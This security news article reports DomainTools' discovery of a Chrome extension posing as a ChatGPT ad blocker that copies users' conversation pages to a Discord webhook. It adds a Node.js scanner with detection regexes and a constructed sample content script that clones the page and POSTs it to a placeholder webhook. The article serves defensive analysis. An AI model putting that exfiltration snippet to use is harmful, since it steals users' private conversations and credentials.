As OpenAI shifts toward serving advertisements to users on its free tier, a new wave of opportunistic threats is emerging. A recent investigation by DomainTools has unmasked a malicious Chrome extension that capitalizes on this policy change, masquerading as a helpful utility while systematically harvesting sensitive user data.
The extension, aptly named “ChatGPT Ad Blocker,” was discovered on the Google Chrome Web Store, where it lured users with the promise of a “free and lightweight” way to “Stop the Ads. Keep the AI.”
Despite its marketing, the primary goal of the extension is not privacy; it is data harvesting. Once installed, the extension injects a script into the user’s browser that clones the entire ChatGPT conversation page.
The technical process is efficient:
- DOM Cloning: The extension clones the entire HTML body of the active ChatGPT page.
- Sanitization (with a twist): While it removes rendering elements like styles and images, it deliberately preserves the text and structure of the conversation.
- Selective Redaction: It redacts only text nodes longer than 150 characters, so most ordinary user prompts and AI responses survive fully intact.
The captured data, which includes full prompts, metadata, and the UI state, is bundled into a “page dump” and sent to a private Discord channel via a webhook hardcoded in the extension’s source, which means the exfiltration destination is recoverable from the extension package itself.
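As an added example (not code from the DomainTools report or from the extension itself), the following Node.js script shows how an analyst can triage an unpacked extension’s content script for the pattern described above: a hardcoded Discord webhook URL plus a DOM dump that strips rendering nodes and gates redaction on text length. It also models the 150-character redaction rule over a handful of conversation snippets to show what survives. The sample scripts, the webhook ID and token, and the conversation text are all constructed for this illustration; the regexes are heuristic indicators, not a signature for this specific extension.

```javascript
// Added example: static triage of a Chrome extension content script for the
// exfiltration pattern described in the article. This is not the extension's
// code and not DomainTools' tooling; the regexes are heuristics and every
// sample below is constructed for the illustration.

// Discord webhook URLs have a fixed shape: /api/webhooks/<numeric id>/<token>.
// A hardcoded one in extension source is a strong exfiltration indicator.
const DISCORD_WEBHOOK_RE = /https:\/\/discord(?:app)?\.com\/api\/webhooks\/(\d+)\/[\w-]+/g;

// Behavioural indicators matching the steps the report describes.
const INDICATORS = [
  { id: 'dom-clone',        re: /document\.body\.cloneNode\s*\(\s*true\s*\)/ },
  { id: 'strip-render',     re: /querySelectorAll\s*\(\s*['"][^'"]*(?:style|img|svg|script)[^'"]*['"]\s*\)/ },
  { id: 'text-length-gate', re: /(?:textContent|nodeValue)\.length\s*[<>]=?\s*\d+/ },
  { id: 'post-to-url',      re: /fetch\s*\(\s*[\w.$]+\s*,\s*\{[\s\S]*?method\s*:\s*['"]POST['"]/ },
];

// Scan one script's text. Returns the webhooks found, the indicator IDs that
// fired, and a coarse verdict: 'clean', 'review' (some indicators, no webhook),
// or 'suspicious' (hardcoded webhook plus DOM cloning or a POST to a URL).
function scanExtensionSource(src) {
  const webhooks = [...src.matchAll(DISCORD_WEBHOOK_RE)].map(m => ({ url: m[0], id: m[1] }));
  const indicators = INDICATORS.filter(i => i.re.test(src)).map(i => i.id);
  let verdict = 'clean';
  if (indicators.length > 0) verdict = 'review';
  if (webhooks.length > 0 && (indicators.includes('dom-clone') || indicators.includes('post-to-url'))) {
    verdict = 'suspicious';
  }
  return { webhooks, indicators, verdict };
}

// Model of the redaction rule the report describes: only text nodes longer
// than `threshold` characters are redacted. Returns the nodes that would be
// sent intact, i.e. what actually leaks.
function redactionSurvivors(textNodes, threshold = 150) {
  return textNodes.filter(t => t.length <= threshold);
}

// Constructed content script mimicking the described behaviour (fake webhook).
const SAMPLE_MALICIOUS = `
const HOOK = "https://discord.com/api/webhooks/000000000000000000/constructed-token";
function dump() {
  const clone = document.body.cloneNode(true);
  clone.querySelectorAll("style, img, svg, script").forEach(n => n.remove());
  const walker = document.createTreeWalker(clone, NodeFilter.SHOW_TEXT);
  let t; while ((t = walker.nextNode())) { if (t.nodeValue.length > 150) t.nodeValue = "[redacted]"; }
  fetch(HOOK, { method: "POST", headers: {"Content-Type": "application/json"},
                body: JSON.stringify({ content: clone.outerHTML.slice(0, 1900) }) });
}
`;

// Constructed benign content script: hides ad slots locally, sends nothing.
const SAMPLE_BENIGN = `
document.querySelectorAll("[data-testid='ad-slot']").forEach(n => { n.style.display = "none"; });
`;

// Constructed conversation text nodes: two short, sensitive ones and one long response.
const SAMPLE_TEXT_NODES = [
  "Rewrite this cover letter; my salary expectation is 95k and I am leaving Acme Corp in May.",
  "Sure. Here is my internal SSO password for testing: Winter2024! (constructed sample)",
  "Here is a revised cover letter. " + "Lorem ipsum dolor sit amet. ".repeat(8),
];

console.log(JSON.stringify(scanExtensionSource(SAMPLE_MALICIOUS), null, 2));
console.log(JSON.stringify(scanExtensionSource(SAMPLE_BENIGN), null, 2));
console.log(redactionSurvivors(SAMPLE_TEXT_NODES));
```

Run it against every `.js` file in an unpacked extension directory; a hardcoded webhook alone is worth a manual look, and a webhook combined with DOM cloning or a POST is the combination the report describes. Note that the long response is the only node the modelled rule redacts: both short prompts, including the credential, pass through untouched.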
“The extension… is primarily designed to steal the user’s ChatGPT conversations data by systematically copying the HTML page and sending it to a webhook on a private Discord channel,” the report warned.
Researchers found that the extension even uses a bot named “Captain Hook” to receive the exfiltrated data. This setup allows the attacker to maintain a persistent, organized stream of stolen intellectual property and personal information.
The extension is linked to the GitHub ID krittinkalra, a persona also associated with larger AI platforms like AI4ChatCo and Writecream. This connection raises significant red flags for the broader AI community.
Writecream and AI4ChatCo claim to serve over 1.5 million users worldwide, offering everything from advanced chatbots to marketing content generation. The discovery of JavaScript malware in the developer’s “Ad Blocker” project prompted the researchers to ask: “It begs the question, is there similar user data theft, privacy violations, and malware in those apps?”